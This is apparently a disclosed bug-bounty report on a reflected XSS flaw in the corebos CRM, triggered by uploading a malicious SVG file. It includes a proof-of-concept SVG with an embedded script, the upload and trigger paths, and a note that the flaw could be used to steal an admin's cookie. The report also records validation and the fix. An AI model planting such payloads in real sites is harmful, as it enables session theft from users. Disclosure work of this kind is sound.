Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Oct 18th 2021

Description

Reflected XSS via upload of malicious SVG file.

Proof of Concep

1: Upload SVG file via /corebos/index.php?module=Documents&action=DetailView&viewname=0&start=&record=8460&

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

2: Trigger the reflected XSS by visiting the malicious SVG file stored in the storage folder (number may be different)- /corebos/storage/2021/October/week3/8464_payload.svg

Impact

This vulnerability is capable of tricking the admin user to visit the malicious SVG file causing a reflected XSS and stealing the cookie. Requires ability to upload files.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 years ago

We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 2 years ago

We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 2 years ago

Joe Bordes validated this vulnerability 2 years ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

Joe Bordes marked this as fixed with commit b44a52 2 years ago

Joe Bordes has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation